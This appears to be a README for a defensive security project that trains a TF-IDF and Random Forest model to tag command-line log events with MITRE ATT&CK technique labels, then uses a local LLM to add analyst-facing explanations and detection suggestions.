This repository demonstrates a machine learning pipeline for detecting MITRE ATT&CK techniques from logs and enriching the output using a local LLM.
The project is divided into two main components:
The ML model is trained to predict a MITRE technique (or BENIGN) from log events.
This allows automation of detection and categorization of potentially malicious behavior.
commandline field from logsmitre_label (e.g., T1059.001, T1105, BENIGN)python scripts/train_mitre_model.py
This script:
Loads the dataset dataset_full_160k.csv
Splits data into train/test sets
Converts command lines to TF-IDF vectors
Trains the Random Forest model
Evaluates performance (precision, recall, F1-score, confusion matrix)
Saves the trained model and vectorizer:
models/mitre_ml_model.pkl
models/tfidf_vectorizer.pkl

Once the ML model predicts a MITRE technique, the LLM enriches the result by providing:
Technique explanation
Why the command matches the technique
Attacker intent
Recommended investigation steps
Suggested detection rules
This step bridges raw ML prediction and SOC analyst actionable insights.
Local LLM (e.g., Phi-3 via Ollama) is called with a prompt containing:
ML prediction
Raw command line
python scripts/enrich_with_llm.py

pip3 install -r requirements.txt
Librairies